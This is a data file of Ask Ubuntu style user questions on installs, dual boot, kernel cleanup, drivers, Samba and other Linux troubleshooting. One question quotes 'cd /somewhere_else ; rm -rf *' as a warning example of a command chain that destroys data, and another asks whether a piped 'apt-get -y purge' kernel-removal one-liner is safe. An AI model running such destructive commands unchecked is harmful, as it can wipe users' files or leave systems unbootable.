334972	installing ubuntu 13.04 on dell xps 12 9q23 in multi booth mode stops at black scren	i have been trying this for a number of days now . i want to install ubuntu alongside windows 8 i know it works on the xps 12 ( www.youtube.com/watch ? v=1fwzqxyc8cc ) . i have downloaded the iso file ( ubuntu-13.04-desktop-amd64.iso ) . i have checked the downloaded iso file integrity using md5sum i have created a live usb ( 16 gb make pny ) in windows8 using pendrivelinux ( pendrivelinux.com ) i am not very clear on disk partitions , but i have checked the system drive and it is apparently already divided into different partitions with a primary partition c : where i believe window8 resides . ( shall i resize the windows8 c : partition ? ) the system bios is set with the following relevant boot parameters : bios settings ( bios version a06 product xps12 9q23 ) boot : add boot options : auto ; windows8 fast booth : disabled ; uefi boot : efi usb1 path2 ( unspecified ) windows boot manager ( ) ; secure boot : disabled ; boot list option : uefi ; secure boot mode : custom ; fast boot : disabled ; load legacy option rom : disabled . when i attempt the installation i get as far as the grub menu : whatever choice i make ( try ubuntu without installation or install ubuntu and the screen goes black . i can see the usb being accessed , as the led is flashing and i know the system is running in some capacity as the keyboard back-light is on , but without screen image there is very little that i can do . a similar issues has been raised in this forum : ( installation stops at a black screen on a dell xps 15z ) and suggestions are made to add acpi=noirq to the kernel parameters . i am not sure about doing that and what it means , although i am able to access the parameters and in any case they are dealing with a different system . i am patiently persevering . thank you for the help .
334976	is it safe to remove old kernels after installing the latest mainline ?	i have installed the mainline kernel 3.10 as recommended here so that i can have my wifi . i 'm running into space problems as described here ( dpkg configuration running out of space , having separate /boot ) is it safe to run the recommended command described in this blog as pointed out in that answer ? if not , how should it be modified ? i 'm using : dpkg -l 'linux-* ' | sed '/^ii/ ! d ; / ' '' $ ( uname -r | sed `` s/\ ( . *\ ) -\ ( [ ^0-9 ] \+\ ) /\1/ '' ) '' '/d ; s/^ [ ^ ] * [ ^ ] * \ ( [ ^ ] *\ ) . */\1/ ; / [ 0-9 ] / ! d ' | xargs sudo apt-get -y purge dpkg -- list | grep linux-image ii linux-image-3.10.1-031001-generic 3.10.1-031001.201307131550 amd64 linux kernel image for version 3.10.1 on 64 bit x86 smp ii linux-image-3.8.0-19-generic 3.8.0-19.30 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-3.8.0-26-generic 3.8.0-26.38 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-3.8.0-27-generic 3.8.0-27.40 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-3.8.0-29-generic 3.8.0-29.42 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-extra-3.8.0-19-generic 3.8.0-19.30 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-extra-3.8.0-26-generic 3.8.0-26.38 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-extra-3.8.0-27-generic 3.8.0-27.40 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp if linux-image-extra-3.8.0-29-generic 3.8.0-29.42 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp iu linux-image-generic 3.8.0.29.47 amd64 generic linux kernel image i 'm not sure about which ones are the latest . please show me which ones are definitely the oldest and unneeded so they can be removed with sudo apt-get purge linux-image-x.x.x.x-generic .
334982	making the mainview fill screen on device	i have been creating an app in the ubuntu sdk . i want to make sure that the app fills the screen on the device ( phone , tablet , etc. ) . i do not have a ubuntu phone or tablet to test this functionality . this is my current height and width : mainview { width : units.gu ( 100 ) height : units.gu ( 75 ) will the app automatically be set to full screen ? if so , does that mean the width of the screen is set to 100 grid units and the height of the screen is set to 75 grid units ?
334984	which memory upgrade is best ?	running ubuntu 12.04 64 bit on a machine with asus m2n-e board , i sometimes receive buffer lockups when watching youtube . i have ( two ) 1 gb sticks of pc2-5300 667 mhz of ddr2 ram ( kingston ) installed . would it be better performance to install two more identical memory sticks in the two open slots or remove what i have and put in two 2 gb sticks of a higher speed rating ? thanks ,
334986	ubuntu running on command line due to insufficient graphics	my problem is that when i was trying to install nvidia drivers ( some 301 version ) on ubuntu 13.04 , it evokes a message a : ubuntu is running on low graphics . after the installation ( i am repenting that installation a lot : ( ) . now , whenever i reboot my laptop it show only command line version of ubuntu 13.04.though i could have reinstall the ubuntu using usb-stick , but it could cost me loss of important data which is stored in home/username/ folder . i tried to copy this folder using live ubuntu through usb-stick , but it is showing that you do n't have permissions to copy that . now , my problem could have multiple solutions such as- i can reinstall nvidia or integrated intel graphics driver so that i can continue with my previous installation and data . i can copy the data to an external harddisk through commands ( which i do n't know ) and reinstall ubuntu ( which i know : ) ) i can copy the data though live ubuntu run through usb-stick to external hard disk . problem is i tried many commands on this forum with similar problems but none had worked yet . your help will be appreciated .
334994	which one is better : using ; or & & to execute multiple commands in one line ?	in tutorials and how-to 's i often see commands combined . for instance , sudo apt-get update & & sudo apt-get install pyrenamer there seem to be four possible connectors : & , & & , || and ; . though the & connector is clear to me ( it sends a process to the background and leaves the terminal available ) , it is not clear what the difference is between & & and ; . and i did not know of || until kaya 's comment . the following questions deal with the difference between the two connectors , but do so mostly in the comments : how to start two ubuntu applications in one go ? how to combine multiple commands in terminal ? so here are a number of related questions : what is the difference between ; and & & ? when should you use them respectively ? it would be nice to see some use cases : if i want to run a command and then after it shutdown my computer , which connector should i choose ? what are their advantages and dangers ? robie basak mentions in a comment to this answer that a command like cd /somewhere_else ; rm -rf * can have destructive consequences if the first element in the command chain fails , for instance . if relevant , where do they come from ?
334995	canon pixma mg 5150 scanning using buttons	i managed to get both the printer and the scanner ( with scangearmp ) working on my 12.04 by installing the packages from canon website ( gutenprint would n't work properly and xsane does n't support this printer ) there 's however one thing that i 'm missing and that is the scanning through the printer buttons which has one advantage over scanning from ubuntu : scanning with buttons gives you the option to output a multiple pages document and save it at the end on the pc as a single file . scanning from ubuntu means that if i have 10 pages to scan , i need to scan and save them separately as pdf and only then combine them into a single document ( i discovered by the way that windows pdf24 creator installs and works just fine with wine ) . this is ok if it 's just 2 or 3 pages , but when scanning a book or a multiple pages document it becomes a real pain . pressing scan buttons on the mg 5150 itself produces no action at all . i wonder if there 's a way of having that function work on ubuntu .
335004	how do i change directories from the command line ?	i 'm try to change to my desktop directory from the terminal . running cd /home/desktop gives an error in the terminal saying no directory found . what am i doing wrong ?
335007	how can i fix gambas3 ?	i am a v.b programmer . i installed gambas3 on ubuntu 13.04 . the problem is when i create a new project and put the objects on the form then run the project no objects visible on the form . note : the folder which i put project on is empty .
335010	how to start a script when déjà dup starts or an smb share was mounted ?	i need to start a script when a deja-dup backup starts . when deja-dup starts the backup , a smb share is mounted by deja-dup . so , would it also be possible to start the script after this smb share was mounted ? is there a way to do that ? i have ubuntu 13.04 .
335011	using alternate kernel in ubuntu 13.04	i am facing this boot crash issue ( along with several other people ) , and have failed to resolve this using various fixes/solutions available online ( in numerous forums/blogs ) kernel panic - not syncing : fatal exception in interrupt but my analysis have concluded that this is a kernel issue which happens with newer versions of ubuntu kernel 3.8.0-21+ versions and not a driver issue of gfx , broadcom , alsa etc question is can i use any other kernel with my ubuntu 13.04 like the main kernel or some alternative/custom kernel or install older versions of generic ubuntu kernel say 3.2 or 3.8.0.0 types i use synaptic to install/remove kernels but the oldest version it shows to which i can downgrade to is 3.8.0.19 which also causes problems but frequency is less , with 3.8.0.26/27 it crashes everytime i boot .
335012	is it possible to install ubuntu os on sony xperia x10 mini pro ? if possible , how to do it ?	is it possible to install ubuntu os on sony xperia x10 mini pro ? if possible , how to do it ? interested versions of ubuntu touch and ubuntu 13.04 or 12.04 but it is a last resort . is the sd card is supported in the ubuntu on my phone ? where to install the application or on a memory card sd or on the phone , or can be transferred from sd to phone and phone to sd , different things ( applications , games , music ... . ) ? of course i have windows 7 on a computer , because surely will need a computer to install ubuntu . i would like to know as much about it because i 'm green with these things a little bit . please answer specific questions , and not , as in other forums many questions and why do you need it . i just want to slowly get away from any other computer systems , telephone and etc.. on linux and now it will be possible even on phones , and i am happy . sorry for the spelling but i use google translate , because i come from polish and do not know english .
335013	i am trying to build and install this driver but failing	i have followed the install directions and say these ./autogen.sh make make install i have succeed executing the ./autgen.sh but when im typing make this error comes : make : *** no targets specified and no makefile found . stop . the driver im trying to install is scangear mp ver . 1.90 for linux ( source file ) ( pixma mx894 )
335014	ubuntu 13.04 login screen problem	i had installed ubuntu 13.04 about a week or two ago . it had been working completely fine , until today . i have it dual-booted with windows xp . i logged into windows , and then due to some reason there was a power outage . when i rebooted the pc , i forgot to press any button and it logged onto ubuntu automatically . it did not load up the regular login screen but defaulted to a non-graphical session . i was prompted to login which succeeded . where do i go from here ? how can i make ubuntu launch with the default login manager again ? i am thinking of loading into live usb and resetting grub ( currently it is burg ) and then , logging into some other version ( kernel version ) of ubuntu . the last one was something ending with .19 and current one is .27 . but before that , i would like to hear all your views , over fixing this .
335017	ubuntu cd installation stuck on purple loading screen	i burnt ubuntu 12.04 to a cd since that was the max it could hold . i 've used the disc four times before , therefore it 's not invalid .
335018	geary does n't validate account	hello ubuntu community , i have issue with email client geary . when i try to validate account it does n't validate it . i 'm using latvian mail service - inbox.lv . i have no trouble to use my mail accounts in thunderbird in elementary luna , but geary wo n't validate it . i even used same imap/smtp setting wich i use in thunderbird . after trying to validate account after 3 minutes of connecting i get this : `` unable to validate : imap connection error ; smtp connection error '' . mail provides me with this info : incoming mail ( pop3/pop3s ) - e-mail address : login @ inbox.lv - pop3 server : mail.inbox.lv pop3 server’s port : 110 ( by default ) pop3s server’s port : 995 ( more info about pop3s ) - smtp server : mail.inbox.lv smtp server’s port : 25 ( by default ) or stmp server`s port : 587* smtp server’s port with tls support : 25 or 587* ( more info about tls ) * some internet service providers block port 25 . it is possible for inbox.lv users to send messages through mail.inbox.lv using port 587 . - username : login soo , guys , any idea to fix this issue ? thank you .
335019	unable to boot windows 8 after ubuntu installation	i installed ubuntu on a pc with windows 8 preinstalled . after installation grub showed ubuntu entries and windows 8 boot manager ( or something similar ) , selecting it i got : /endentire file path /acpi ( a0341d0,0 ) /pci ( 2,1f ) /unknownmessaging ( 12 ) /hd ( 2 , e1800,82000,963b540a6178e211,8d,38 ) /file ( \efi\microsoft\boot ) /file ( bootmgfw.efi ) /endentire error : can not load image . after that i run boot-repair with the default options . this is the file it generated : http : //paste.ubuntu.com/6005571 and this grub entries : ubuntu advanced options for ubuntu windows uefi bkpbootmgfw.efi windows boot uefi loader efi/toshiba/boot/bootmgfw.efi windows boot manager ( uefi on /dev/sda2 ) system setup ( bios menu ) the four about windows 8 all give a similar error message : windows uefi bkpbootmgfw.efi /endentire file path /acpi ( a0341d0,0 ) /pci ( 2,1f ) /unknownmessaging ( 12 ) /hd ( 2 , e1800,82000,963b540a6178e211,8d,38 ) /file ( \efi\microsoft\boot ) /file ( bootmgfw.efi ) /endentire error : can not load image . windows boot uefi loader /endentire file path /acpi ( a0341d0,0 ) /pci ( 2,1f ) /unknownmessaging ( 12 ) /hd ( 2 , e1800,82000,963b540a6178e211,8d,38 ) /file ( \efi\microsoft\boot ) /file ( bkpbootx64.efi ) /endentire error : can not load image . efi/toshiba/boot/bootmgfw.efi /endentire file path /acpi ( a0341d0,0 ) /pci ( 2,1f ) /unknownmessaging ( 12 ) /hd ( 2 , e1800,82000,963b540a6178e211,8d,38 ) /file ( \efi\toshiba\boot ) /file ( bootmgfw.efi ) /endentire error : can not load image . windows boot manager ( uefi on /dev/sda2 ) /endentire file path /acpi ( a0341d0,0 ) /pci ( 2,1f ) /unknownmessaging ( 12 ) /hd ( 2 , e1800,82000,963b540a6178e211,8d,38 ) /file ( \efi\microsoft\boot ) /file ( bootmgfw.efi ) /endentire error : can not load image . how can i fix this ? update : following rod smith answer i tried wit refind from an usb flash drive . it shows two windows icons , one of which work ( the other gives an error , it 's the one that says probabbly grub ) . the working one is : boot microsoft efi boot ( boot repair backup ) from 256mib fat volume so i was able to boot into windows , now how can i fix this so that i do n't have to use refind ? and how can i remove refind from my pc ( it shows also after removing the usb flashdrive from the pc ) ?
335021	how to install printer hp laserjet p1102 on ubuntu 13.04	i bought an hp laserjet p1102 printer . how can i install it on ubuntu 13.04 ?
335023	can not create a new document in /var/www	i 'm unable to create a new document in /var/www/ i followed this tutorial : - how to avoid using sudo when working in /var/www ? and did as suggested , but still i 'm unable to make a new document . any suggestions ?
335025	prevent grub from recognizing windows volume	i have a dual-boot system , that has windows 7 with a mcafee encrypted endpoint volume , and ubuntu 12.04 ( 3.5.0 kernel ) on a totally separate ( expansion bay ) volume . currently the system ( a laptop ) boots just fine into either system , if either : i physically remove the drive containing the system not being used . i boot into the bios and select the drive containing the system that i want . i want to keep it this way . over the past few months ( ever since the mcafee encryption was enabled ) at various times i have had mcafee corrupt the ( pre-mcafee ) windows volume grub mbr , and had a grub2 update corrupt the windows 7 mcafee ee mbr , to the point that one or the other system was inaccessible . now , i have reached a stable point where the win 7 volume seems to know nothing about the ubuntu volume , and visa versa . but because the last corruption occurred during the grub 1.99 update ( and subsequent auto-invocation of update-grub ) i am worried each time i see a new kernel pushed out . i have been removing my win-7 volume before updating the kernel just to be safe , so that there is no way grub even sees it . but is there a way to permanently tell grub that under no circumstances should it touch the windows volume ? bios selection is n't as friendly as grub , but it seems to be safer ... and i still want to use grub to switch between ubuntu kernel versions .
335026	sending commands from ubuntu to windows	on our home network we have 1 windows 7 only pc and several computers with ubuntu 13.04 ( dual boot with backup windows 7 for programs that ca n't be run using wine ) . we want to be able to send commands ( like msg or shutdown etc ) to that windows pc ( and if possible we want that windows 7 pc to be able to send commands to the linux pc 's ) . how do i do this ? @ radu rädeanu : i already had smbclient but i want to do more then just send messages thanks braiam , i got it to work . for the people from the future i give thee the prerequisites ( i had them except autoconf but it 's a common problem so i 'll just give them all ) sudo aptitude install build-essential autoconf checkinstall \ python python-all python-dev python-all-dev python-setuptools libdcerpc-dev next you use the autogen.sh from source4 and follow the instructions from there on when you 're finished run make basics bin/winexe ( this will take some time ) ./bin/winexe -v you should get `` version 4.0.0alpha11-git-unknown '' it should work for more info check http : //www.aldeid.com/wiki/winexe
335027	sound completely cut out , and restart or pulse audio ca n't fix it	yes , i was watching a webm video . specifically the recent linuxactionshow `` review '' of elementary os luna . and about 8 or 9 minutes into the video . the sound just cut out completely . and now no sound plays at all . mp3 files , ogg sound files , any movies of any format . no game sounds nothing . restarting does not fix it , and pulse audio settings are all as they should be . and yes i tried changing them and switching around just to see if it might do anything . nothing . so to make sure my speaker were not busted , i installed elementary os on a thumb drive , plus i wanted to try it anyway . sound worked just fine with not settings changes . so i wanted to go ahead and finish watching the las review of e-os , so i went into my system 's drive and install necessary drivers . and it worked find and sound was good . until part way through it happened again . and i do n't think it was at the same time mark either . but since i made a persistence on this live thumb drive , rebooting into elementary os as a live instance also does n't bring sound back . its just gone . no mp3 sound , ogg sound or anything . to me , this can not be a bios hardware setting since nothing was changed before booting into the live usb . but anything settings should be reflected in pulse audio or other sound menus right ? ? or is there a deeper `` kernel '' setting i need to be aware of ? this is a very concerning issue , and the only way i see to fix it so far , is reinstall , and i will wipe a 2 year old install just because of sound , especially if its something that will probably happen again . i can add screen shots of my sound settings if need be , but i am very familiar with what they are normally and like i said , i was no where near the keyboard or mouse when this began . just a instant cut out of all sound . thank you and god bless . update i tried headphones and they work fine . the sound settings are updated to reflect the `` headphone '' status . but if i manually in switch back to `` speakers '' in settings , leaving the headphones plugged in . the sound stays coming out the headphones despite the change . uplugging the headphones stops all sound again and nothing is muted . this is extremely strange . update # 2 i 'm sorry rolandixor , but this did not fix my problem . i was hoping that terminal program would help , but all the settings were fine . i just could n't remember how to bring it up . here is a screen shot of what i was seeing . i know nothing is muted . also , it is not the headphones that is the problem . headphones are the only thing that works . the speakers do n't . and i am almost positive its not a broken speaker because it suddenly cut out while watching a webm video . no popping or weird noise . just all the sudden no sound while i was sitting not touching the computer at all . also , when i 'm looking at the pulseaudio controller . it shows that the sound is playing with the bar that moves as a song or a video plays . speakers are selected , not muted , but no sound at all . : - ( update # 3 and final took the laptop to a repair shop , as many other things were going wrong , and turns out the hardware wal-mart sells is extremely low quaility motherboards and other parts , that have been marked up to standard quality prices . capacitors that burn out very easy , and the like . the laptop is now waiting to be recycled . so seems like this was a hardware problem after all . sorry to all that worked so hard to help . it just seemed like it had to be software related , as the 2 times it cut out , then came back , were at the exact same time stamp of a particular video file . once on the hdd installed ubuntu , then the second cut out was on a liveusb instance . where the moment i booted into the liveusb sound worked fine , then cut out once the said video was played . but never came back . since then i 've using the hdd out of it as a portable live drive , that i can take anywhere with me to have full size storage to boot into from any computer . nice backup system . thank you all for the hard thoughtful advice and help . and god bless
335040	ftp permissions read but not write	i made a personal ftp server on an old laptop but when i connect i can only read/download no upload . how do i change this ? thanks for the help in advance i am use vsftpd
335053	i have 5 camera , 5 microphone connected to ubuntu , how can i tell chromium browser or google browser to have one default ?	i have many camera and microphone source connected to ubuntu usb . but out of them 1 is only to be used for default case chrome/firefox/skype etc . how can i tell chrome browser via command line or javascript or any static configuration method to use always one camera input source and one microphone input source ? not doing it like this way , cause it will be in remote locations ( no hands and eyes )
335054	deleted the folder /usr/share/icons/ and now all icons are 'white ' for anything , how to change it to `` gray '' ?	i deleted my folder /usr/share/icons/ and now every icon is a white icon no matter what it is . i kind of like it this way , but i want to modify this white icon so it 's gray . can this be done , and if so , how ?
335055	how to force group ownership on samba share ?	i have a samba server running on ubuntu server 12.04 . only one folder /sharetest is shared with group storageusers , and users user1 , user2 , wowza are members of it . here is smb.conf # ======================= global settings ===================================== [ global ] workgroup = workgroup server string = samba server % v netbios name = ubuntu security = user map to guest = bad user dns proxy = no # ============================ share definitions ============================== [ storage ] path = /sharetest browsable = yes writeable = yes guest ok = no valid users = @ storageusers create mask = 0775 directory mask = 0775 a second ubuntu server 12.04 will be using above mentioned share . the share on the second server is automounted via fstab line //192.168.1.12/storage /share smbfs credentials=/root/.smbcredentials , gid=0 0 0 file and folders created inside share folder on the second server have ownership of user wowza and group wowza . i assume because of this other share users do not have access to writing or deleting files and folders . is there a setting for samba server that will force all files and folders created on share to have group ownership set to storageusers instead of user 's primary group ?
335058	is it good practice to upgrade .deb packages with pip ?	it seems some blogs recommend installing pip and setuptools ( actually distribute on ubuntu ) with : $ sudo apt-get install python-pip python-setuptools and then upgrading them with : $ sudo pip install -u pip $ sudo pip install -u setuptools this has some advantages compared to installing them with ez_setup.py and get-pip.py . for example if i install a package that depends on pip/setuptools with apt-get , it wo n't try to install the old versions of them because as far as it is concerned they are already installed . what i want to know is , will this cause any trouble for me in the future ( ex : when upgrading ubuntu to a newer release ) ?
335059	will hardware changes affect system ?	i have ubuntu production server 12.10 x64 installed on system with hi end hardware . i want to change mainboard , cpu , and ram to older ones . basically from current system only hdd will remain unchanged . is that safe to do ? can i do it without reinstalling system ?
335066	what would i write as a directory ?	i 'm trying to write a .desktop link for cave story , a game that i 'm trying to play . someone put the code to make a launcher icon on the desktop and the code is : sh -c `` cd /your_cave_story_directory_here ( linuxdoukutsu-1.01 ) & & ./doukutsu '' the emplacement of the folder ( i downloaded it as a .zip , do n't know if it has to be one of not ) is home ( i believe that it 's $ home ) , linux games , and then cave story . i 'm sorry to ask this easy question but i 'm really new to ubuntu and i have no idea what to write as the code .
335067	i ca n't connect internet through vodafone dongle	i have connected the dongle to my laptop , it shows in network manager with my network provider name ( tata docom ) , but ca n't connect to internet . how can i fix this ? writing in terminal lsusb command gives following output bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 19d2:0143 zte wcdma technologies msm here zte wcdma is my dongle device device : usb0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : mobile broadband ( gsm ) driver : cdc_acm state : disconnected default : no capabilities :
335072	update and upgrade ubuntu 11.10	i have dell latitude e6430 , system information : ubuntu 11.10 , os type 64 bit . when i tried to make updates to my ubuntu 11.10 , it gave me a message , that you ca n't update anything until you remove third party repositories , but you can make upgrade . message 1 : your ubuntu release is not supported anymore . you will not get any further security fixes or critical updates . please upgrade to a later version of ubuntu linux . message 2 : not all updates can be installed . run a partial upgrade , to install as many updates as possible . this can be caused by : a previous upgrade which did n't complete . problems with some of the installed software . unofficial software packages not provided by ubuntu . normal changes of a pre-release version of ubuntu . i clicked on partial upgrade and it prepares upgrade for three hours then start to upgrade , then it did n't finish and stops then these message appear . message 3 : software index is broken . it is impossible to install or remove any software . please use the package manager `` synaptic '' or run `` sudo apt-get install-f `` in a terminal to fix this issue at first . when writing the command sudo apt-get install -f , the following appear reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : gir1.2-timezonemap-1.0 gir1.2-gstreamer-0.10 efibootmgr libtimezonemap1 libdmraid1.0.0.rc16 libdebconfclient0 user-setup rdate python-argparse libdebian-installer4 btrfs-tools apt-clone localechooser-data python-xklavier archdetect-deb dmraid python-pyicu use 'apt-get autoremove ' to remove them . the following extra packages will be installed : adobe-flash-properties-gtk adobe-flashplugin firefox firefox-globalmenu fontconfig libc-bin libc6 libqt4-dbus libqt4-declarative libqt4-network libqt4-opengl libqt4-script libqt4-sql libqt4-sql-mysql libqt4-svg libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw libreoffice-gnome libreoffice-gtk libreoffice-impress libreoffice-math libreoffice-writer python-uno qdbus thunderbird thunderbird-globalmenu thunderbird-gnome-support uno-libs3 ure suggested packages : konqueror-nsplugins msttcorefonts ttf-bitstream-vera ttf-dejavu ttf-xfree86-nonfree xfs libnspr4-0d latex-xft-fonts glibc-doc libqt4-declarative-folderlistmodel libqt4-declarative-gestures libqt4-declarative-particles libqt4-declarative-shaders qt4-qmlviewer libqt4-dev qt4-qtconfig libreoffice-base libreoffice-style-hicontrast libreoffice-style-tango libreoffice-style-crystal libreoffice-style-oxygen libreoffice-evolution libreoffice-gcj libreoffice-java-common libreoffice-filter-binfilter cli-uno-bridge the following new packages will be installed : fontconfig libc-bin the following packages will be upgraded : adobe-flash-properties-gtk adobe-flashplugin firefox firefox-globalmenu libc6 libqt4-dbus libqt4-declarative libqt4-network libqt4-opengl libqt4-script libqt4-sql libqt4-sql-mysql libqt4-svg libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw libreoffice-gnome libreoffice-gtk libreoffice-impress libreoffice-math libreoffice-writer python-uno qdbus thunderbird thunderbird-globalmenu thunderbird-gnome-support uno-libs3 ure 34 upgraded , 2 newly installed , 0 to remove and 464 not upgraded . 2 not fully installed or removed . need to get 0 b/134 mb of archives . after this operation , 28.2 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17 . extracting templates from packages : 100 % preconfiguring packages ... dpkg : warning : 'ldconfig ' not found in path or not executable . dpkg : error : 1 expected program not found in path or not executable . note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin . e : sub-process /usr/bin/dpkg returned an error code ( 2 )
335074	getting ubuntu 12.04.2 to show gui interface after installing it as a vm in xenserver 6.1	after installing ubuntu 12.04.2 within as a vm on xenserver 6.1 i only have the command line interface . i have tried running the following commands to install that gui and it stated that it was install successfully . however , after the reboot the gui did not show . sudo apt-get upgrade sudo apt-get install ubuntu-desktop sudo reboot after reboot only the command line shows up . how can i get the gui to show up ?
335076	libreoffice 3.5.72 - non printing characters	i am trying to visualize non printing characters on libreoffice 3.5.7.2 build id : 350m1 ( build:2 ) in ubuntu 12.04 according to the help page and to what i have found on line , i should either press ctrl + f10 or go to tools - options - libreoffice writer/libreoffice writer/web - formatting aids as an other alternative , i could modify the standard bar ( adding the desired tool ) . the problem is that none of these is available ! no relevant icon in the standard bar , no libreoffice writer in the options , no function linked to ctrl + f10 ! am i doing it wrong ? do i need to update libre office ? edit : hi , vasa1 , the tool was installed by default . i will have a look at other posts regarding the menus and see if updating it solved the issue .
335082	how to burn an iso-image with root access only ?	i would like to know how can i burn an iso-image file in a directory ( inside another partition ) that i can only read with root permission using sudo . there is no left room , i can not copy , move or duplicate the file . i can not change the owner nor the permissions either . if i launch brasero as root gksu brasero , from there i can read the directory and select the iso file but i can not select the blank cd to burn it . if i run disk utility from the menus , then i can use the cd/dvd but i can not read the directory to select the iso file . i can not find how to boot from the command line the disk utility . disk utility is a useful program without which many things can not be done or is very problematic to do them , for example if you want to mount the partition where the persistent file ( for an iso booting ) lives . why is n't it with other programs/utilities ? ? is there a way ( maybe with command line ) to read with sudo the file and pass the data to a program that burns the disk without buffering problems ? also , i would like to know if there is a labyrinthine solution to this and if that is normal or the applications are not well user-designed .
335083	displaylink 13.04 kernel 3.9 edid issue	i have followed this thread how to make ubuntu 13.04 work with displaylink monitor ? but i get stuck as my displaylink adapter does not pass edid info on . ( the monitor does if i connect directly with dvi ) . linux detects a monitor , but gives it a generic resolution , and draws it on top of the main display . any `` configuring '' of it does n't help . some older docs make reference to /sys/class/graphics/fb ? files and writing an edid blob . under the above ( 13.04 kernel 3.9 or 3.10 ) the edid file is no longer generated and can not be created . as i can get the edid from the monitor , is there anyone who knows how to get the displaylink drivers to read the edid blob from somewhere ? alternatively , does anyone know of a working usb displaylink dvi adapter ?
335084	mouse back button brings up run command box after sending `` back '' command	relevant , did n't help much though . i 've got a rat 7 that i 'm using in ubuntu . it 's working fine , but for some reason when i hit the `` back '' button it will output alt left and then bring up the 'run command ' box . alt left looks like `` ^ [ [ 1 ; 3d '' in bash . in chrome it will send the `` back '' command to the browser , then bring up the run command box , like it 's hitting alt left then alt f2 . well not exactly like alt f2 , the box looks similar but is smaller , it 's just the text box . you can see what happens after i click the back button here : http : //imgur.com/finpvqu ( see upper left ) . happens in bash as well . i 've tried using xinput test but it does n't seem to be capturing . i 'm running ubuntu in a vm . i have a right/left wheel on the mouse as well and it is working fine . i 've tested the back button in the mouse 's config and it 's not outputting anything other than alt left . it 's not a big deal but i would like to fix it .
335090	ca n't install apps or updates ... help ?	i have an ubuntu based distro ( elementaryos ) 12.04 and i 'm having an issue where i ca n't update the system nor can install any apps . basically i ca n't do anything with it ! before this i simply got an error at every time an installation finished , but the app installed anyway . now i am a newbie so i ca n't what went wrong that well , but i remember it complained about the kernel image verification `` linux-image-3.5.0-18-generic needs to upgrade but failed to install '' . at a later stage then it would n't install any app at all , and every time i tried , it wanted to install this `` linux-image-3.5.0-18-generic '' , even when removing apps , actually everything i needed to do , started downloading that ^ which is about 12.1mb . than .deb went in var/cache/apt/archives this `` linux-image-3.5.0-18-generic '' never installed always gave me error at the end ! also i remember it complained about dependencies in the same error . then i thought of removing all the ppa 's that i added after i installed eos . that resulted in the following problem where i ca n't do anything , it does n't even download the .deb anymore , and every time i open update manager it gives me this error and closes . e : the package linux-image-3.5.0-18-generic needs to be reinstalled , but i ca n't find an archive for it . i do n't understand why i needed to upgrade/install 3.5.0-18 when my kernel is , `` kernel linux 3.10.7-031007-generic '' which is newer and is the only kernel in my linux ! i added/checked all ppa 's back and same error . can someone help ? sorry if i sound too noobish.thnx in advance !
335093	ubuntu 13.04 kernel panicking when booting up with hdmi tv plugged in	my laptop is setup as a media server - when it boots up when plugged in to my tv via an hdmi cable , it generally kernel panics ( although not always ) . the kernel panic is : any ideas ? i 'm running ubuntu 13.04 , but it did the same on 12.04 and 12.10 .
335096	muxless hybrid graphic card and power-saving	i have a laptop with hybrid intel/amd graphics . as far as i know , the configuration is muxless . this causes not-detection of discrete graphic card . and now my problem : i don/t know how to turn the discrete card completely off . i think it is powered all the time , because of critically short battery work time ( approx . 3 hours instead of windows 7-8 ) . tlp and adjusting the brightness do not bring expected effect . i would really appreciate any help .
335097	how to fix ubuntu 12.10 brightness and lock icon	when clicking on the brightness and lock icon , the system settings just closes but never open brightness and lock .
335104	how can i install 13.04 on nexus 7 instead of 13.10 ?	when i have been installing ubuntu touch on my nexus 7 it installs the latest saucy . at the moment there are several things that worked in raring that do n't in saucy for the nexus 7 . how can i do a new install on the nexus 7 but install raring instead of the developing saucy ?
335108	juju cant ssh service units	i have deployed ceph now i am trying to ssh , so i am running following cmd which is giving me error , sam @ maas01 : ~ $ sudo juju ssh ceph/0 permission denied ( publickey , password ) . error : exit status 255 i have public key generated in /home/sam/.ssh/ so i am thinking it should work but its not . i had also tied to explicitly specify key path in enviornments.yaml file which did n't helped . and as i had seen in many posts not to add ssh keys in maas web panel , so i have n't added key there . how i can ssh ? : (
335114	steam does n't launch	i installed steam using ubunt software center , but whe tried to launch , it showed this error in terminal steam needs to install these additional packages : libgl1-mesa-dri-lts-quantal : i386 , libgl1-mesa-glx-lts-quantal : i386 sudo : unable to change to sudoers gid : operation not permitted sudo : setresuid ( ) [ 0 , 0 , 0 ] - > [ 115 , -1 , -1 ] : operation not permitted sudo : unable to change to sudoers gid : operation not permitted sudo : setresuid ( ) [ 0 , 0 , 0 ] - > [ 115 , -1 , -1 ] : operation not permitted press return to continue : what am i supposed to do ?
